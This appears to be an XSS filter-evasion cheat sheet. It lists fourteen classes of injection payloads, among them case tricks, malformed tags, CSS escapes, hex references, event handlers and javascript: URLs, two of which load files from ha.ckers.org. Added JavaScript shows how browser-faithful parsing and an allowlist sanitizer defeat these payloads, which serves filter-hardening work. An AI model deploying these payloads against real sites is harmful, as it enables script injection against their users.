1. Vary the character case

The browser matches tag names case-insensitively, so a case-sensitive filter misses this:

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

A filter that expects well-formed tags, assumes the first ">" closes the tag, or assumes an attribute value cannot contain ">" or quotes stops reading before it reaches SRC (backticks as attribute quotes are an Internet Explorer quirk):

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use a file extension other than .js

The extension in the URL is irrelevant; the SCRIPT element executes whatever the server returns as the response body. Current browsers do refuse a script response served with an image/*, audio/* or video/* Content-Type, so the server still has to return a script-compatible type for the file.

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

A javascript: URL inside CSS only ran in old Internet Explorer and other browsers of that era; current browsers do not execute it.

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example xss.css:

body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert extra characters inside the script tag

The HTML tokenizer treats "/" inside a tag like whitespace, so a filter that expects a space after the tag name never sees the SRC attribute:

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or newline to evade

The URL parser removes every tab, CR and LF from a URL before it reads the scheme, so the split-up word still resolves to javascript: (a plain space is not removed and does not work the same way):

<img src="jav	ascr	ipt:alert('XSS3')">
-> tab (the gaps inside the word are tab characters)

<IMG SRC="jav
ascript:alert('XSS');">
-> new line
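Added example, not part of the original post: the vectors from items 1, 2, 5 and 6 run against a naive regex filter of the kind they are written to slip past, next to a minimal tag reader that follows the rules the browser's HTML tokenizer and URL parser actually apply. The naiveFilter rules and the readTag/urlScheme helpers are my own; the payloads and the placeholder file name t.js are the ones from the list above.

```javascript
// Added example, not from the original post. naiveFilter models a typical
// blocklist; readTag and urlScheme follow the browser's own parsing rules.
const WS = " \t\n\r\f";

// Naive blocklist: assumes a space follows the tag name and the first ">"
// closes the tag, is case-sensitive for inline <script>, and looks for the
// literal text "javascript:". Every vector below returns false here.
function naiveFilter(html) {
  if (/<script [^>]*src=/i.test(html)) return true; // external script
  if (/<script>/.test(html)) return true;            // inline script
  if (/javascript:/i.test(html)) return true;        // scheme in a URL
  return false;
}

// Reads the first start tag the way the HTML tokenizer does: the tag name ends
// at whitespace, "/" or ">" and is ASCII-lowercased; "/" between attributes is
// skipped like whitespace; a ">" inside a quoted value does not end the tag.
function readTag(html) {
  let i = html.indexOf("<") + 1;
  const nameEnd = (c) => WS.includes(c) || c === "/" || c === ">";
  let name = "";
  while (i < html.length && !nameEnd(html[i])) name += html[i++];
  const attrs = {};
  for (;;) {
    while (i < html.length && (WS.includes(html[i]) || html[i] === "/")) i++;
    if (i >= html.length || html[i] === ">") break;
    let attr = "";
    while (i < html.length && !nameEnd(html[i]) && html[i] !== "=") attr += html[i++];
    let value = "";
    if (html[i] === "=") {
      i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < html.length && html[i] !== q) value += html[i++];
        i++; // closing quote
      } else {
        while (i < html.length && !WS.includes(html[i]) && html[i] !== ">") value += html[i++];
      }
    }
    if (attr) attrs[attr.toLowerCase()] = value;
  }
  return { name: name.toLowerCase(), attrs };
}

// Scheme of a URL as the URL parser sees it: leading and trailing C0 controls
// and spaces are trimmed, every tab, LF and CR anywhere in the string is
// removed, and the result is ASCII-lowercased. Returns null for a relative URL.
function urlScheme(url) {
  const s = url.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "").replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// What the browser ends up with for one tag: parsed name, attributes, schemes.
function browserView(html) {
  const { name, attrs } = readTag(html);
  const schemes = {};
  for (const [k, v] of Object.entries(attrs)) schemes[k] = urlScheme(v);
  return { name, attrs, schemes };
}

// True when the blocklist says "clean" but the parsed view shows a script
// element or a javascript: scheme, i.e. the vector gets through.
function bypasses(html) {
  const view = browserView(html);
  const dangerous = view.name === "script" || Object.values(view.schemes).includes("javascript");
  return dangerous && !naiveFilter(html);
}

// The list's own payloads (item 6 with real tab characters inside the scheme).
const VECTORS = [
  "<sCript>alert('d')</scRipT>",                // item 1: case
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',         // item 2: ">" inside a quoted value
  '<SCRIPT/SRC="t.js"></SCRIPT>',               // item 5: "/" instead of a space
  "<img src=\"jav\tascr\tipt:alert('XSS3')\">", // item 6: tabs inside the scheme
];
```

Run bypasses() over VECTORS and every entry comes back true, while browserView() shows a "script" tag name or a "javascript" scheme for each; the point is that a filter has to parse the way the browser parses, not grep the raw text.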
7. Use a backslash to evade

The CSS parser resolves a backslash before a non-hex character to that character and strips /* */ comments before it reads the property, so expre\ssi\on and expr/*anyword*/ession both arrive as expression. expression() itself is Internet Explorer only.

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

In the last one the "*//*" inside the quoted string is there to confuse a comment-stripping filter that does not track strings: the filter treats the /* inside the string as the start of a comment and swallows the wrong span, while the CSS parser keeps the string intact and still sees expression.
8. Use hex encoding to evade (the ";" that ends each character reference may also be dropped)

The keyword in the STYLE or CONTENT value is written as HTML hex character references (for example j as &#x6A; and : as &#x3A;). The browser decodes them before the attribute value is handed to the CSS parser or the refresh handler, but a filter matching the raw text never sees "expression" or "javascript:". The ";" can be omitted because a numeric reference ends at the first non-hex character; that also means it must not be omitted right before a letter a-f, or the letter is swallowed into the code point.

original source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

original source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
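Added example, not part of the original post: the two decoding layers that items 7 and 8 rely on, each implemented the way the browser applies it, with the regex comment-stripper those vectors beat for comparison. The helper names (decodeNumericRefs, hexRefs, decodeCssValue, naiveStripComments, hidesScript) are mine; the payloads are the ones listed above.

```javascript
// Added example, not from the original post. Layer 1 is HTML character
// reference decoding of an attribute value; layer 2 is CSS tokenization of
// the decoded value. naiveStripComments models a typical regex filter.

// Layer 1: numeric character references. The terminating ";" is optional:
// the reference ends at the first character that is not a digit of its base.
// That is also the catch when ";" is dropped: in "&#x3Aalert" the "a" of
// "alert" is consumed as a hex digit and the result is not ":alert".
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, body) => {
    const hex = body[0].toLowerCase() === "x";
    const cp = parseInt(hex ? body.slice(1) : body, hex ? 16 : 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// Encoder for the same form, used to build the item 8 variants of a payload.
function hexRefs(text, withSemicolon = true) {
  return [...text]
    .map((c) => "&#x" + c.codePointAt(0).toString(16).toUpperCase() + (withSemicolon ? ";" : ""))
    .join("");
}

// Layer 2: CSS tokenization. Comments are dropped; a backslash before a
// non-hex character yields that character; a backslash before 1-6 hex digits
// yields that code point (and eats one following whitespace character); "/*"
// inside a quoted string does not open a comment.
function decodeCssValue(css) {
  let out = "";
  let quote = null;
  for (let i = 0; i < css.length; ) {
    const c = css[i];
    if (!quote && c === "/" && css[i + 1] === "*") {
      const end = css.indexOf("*/", i + 2);
      i = end === -1 ? css.length : end + 2;
    } else if (c === "\\") {
      const hex = /^[0-9a-f]{1,6}/i.exec(css.slice(i + 1, i + 7));
      if (hex) {
        const cp = parseInt(hex[0], 16);
        out += cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
        i += 1 + hex[0].length;
        if (i < css.length && " \t\n\r\f".includes(css[i])) i++;
      } else {
        out += css[i + 1] || "";
        i += 2;
      }
    } else {
      if (c === quote) quote = null;
      else if (!quote && (c === '"' || c === "'")) quote = c;
      out += c;
      i++;
    }
  }
  return out;
}

// What a regex filter typically does instead: strip comments blindly, with no
// notion of strings or escapes.
function naiveStripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, "");
}

// The STYLE attribute value as the CSS engine finally receives it.
function cssAsParsed(styleAttr) {
  return decodeCssValue(decodeNumericRefs(styleAttr));
}

// True if the parsed value contains an expression() call or a javascript: URL.
function hidesScript(styleAttr) {
  return /expression\s*\(|javascript:/i.test(cssAsParsed(styleAttr));
}
```

hidesScript() catches every item 7 payload and the hex-encoded item 8 form because it checks the value after both decoding steps; naiveStripComments() applied to the A STYLE payload from item 7 removes the wrong span and leaves no "expression" to match.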
9. Script in HTML tag event handlers

Unlike most of the vectors on this list, this works in every browser, which makes it the class to worry about most:

<body onload="alert('onload')">

Any of the following attributes takes script:

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF

AllowScriptAccess="always" lets the Flash movie call into the page's JavaScript:

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code so the browser reassembles it (Internet Explorer XML data islands)

DATASRC and DATAFLD bind a field of the data island to the SPAN, and DATAFORMATAS=HTML makes IE render that field as markup, so the IMG is put back together from pieces a filter only ever saw separately:

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME (Internet Explorer only)

t:set assigns the decoded string to innerHTML; the DEFER attribute is what makes IE execute a SCRIPT that was inserted through innerHTML:

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>

13. Write a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

The payload only fires if the application later reflects the cookie value into a page without escaping it, and the HTML standard now requires browsers to ignore an http-equiv Set-Cookie, so this is a legacy vector.
14. javascript: in src, href and url()

A javascript: URL in IFRAME and FRAME SRC still runs in current browsers; the IMG SRC, DYNSRC, LOWSRC, TABLE BACKGROUND, LINK HREF and CSS url() forms are legacy Internet Explorer behaviour.

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
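Added example, not part of the original post: an attribute-level allowlist policy applied to a tag after it has been parsed and its attribute values decoded, which is what closes items 9 and 14 at once instead of grepping the markup for "javascript:". The tag allowlist also removes the SCRIPT, LINK, EMBED, XML, META and STYLE elements that items 3, 4 and 10 to 13 depend on. The tag and attribute lists, the scheme allowlist and the style rule are my choices for a plain HTML sanitizer; the payloads are the ones listed above.

```javascript
// Added example, not from the original post. Policy for one parsed tag:
// allowlist the element, drop every event handler, allow URL attributes only
// with http/https/mailto or a relative URL, and allow style only in a form
// that cannot carry url(), expression(), escapes, comments or references.
const ALLOWED_TAGS = new Set(["a", "b", "i", "p", "br", "div", "span", "img", "table", "tr", "td", "ul", "ol", "li"]);
const URL_ATTRS = new Set(["src", "href", "dynsrc", "lowsrc", "background", "action", "formaction", "data", "poster"]);
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Scheme as the URL parser reads it: trim C0 controls and spaces, drop tab,
// LF and CR anywhere, lowercase. null means a relative URL.
function schemeOf(url) {
  const s = url.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "").replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// style allowlist: a few properties whose value is drawn from a character
// class that excludes "(", "\", "/", "&" and quotes, so none of the item 7,
// 8 or 14 tricks can be expressed in an accepted value.
const SAFE_STYLE = /^\s*(color|background-color|font-size|font-weight|text-align)\s*:\s*[#\w\s.%-]+;?\s*$/i;

// Decide per attribute: "keep" or "drop". Values are assumed to be already
// decoded, as a DOM parser delivers them.
function attributeDecision(name, value) {
  const n = name.toLowerCase();
  if (n.startsWith("on")) return "drop";               // every event handler (item 9)
  if (URL_ATTRS.has(n)) {                              // item 14 attributes
    const scheme = schemeOf(value);
    return scheme === null || ALLOWED_SCHEMES.has(scheme) ? "keep" : "drop";
  }
  if (n === "style") return SAFE_STYLE.test(value) ? "keep" : "drop";
  return "keep";
}

// Apply the policy to one parsed tag ({ name, attrs }); null means the whole
// element is removed.
function sanitizeTag(tag) {
  const name = tag.name.toLowerCase();
  if (!ALLOWED_TAGS.has(name)) return null;
  const attrs = {};
  for (const [k, v] of Object.entries(tag.attrs)) {
    if (attributeDecision(k, v) === "keep") attrs[k.toLowerCase()] = v;
  }
  return { name, attrs };
}
```

Note that src="bad.jpg" from item 3 is accepted as a relative URL by attributeDecision(); it is the element allowlist in sanitizeTag() that rejects the SCRIPT around it, which is the right layer for that decision.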